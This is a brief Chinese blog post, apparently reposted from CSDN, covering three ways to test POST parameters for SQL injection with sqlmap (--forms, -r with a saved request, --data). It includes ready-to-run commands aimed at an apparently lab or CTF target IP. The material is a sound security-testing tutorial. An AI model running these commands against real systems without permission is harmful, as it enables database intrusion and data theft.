sqlmap post注入的三种方式

最简单的:“-- forms”

sqlmap -u “http://220.249.52.133:45128” --forms --dbms=mysql

-r 文件名

在这里插入图片描述
把这里面的数据复制到一个txt文件里。
然后:
sqlmap -r 1.txt --batch

–data=“key:value”

当知道post的数据的形式时,采用这种键值对的方式来进行注入:
sqlmap -u “http://220.249.52.133:45128” --data=“search=1”

猜你喜欢

转载自blog.csdn.net/qq_29566629/article/details/107906691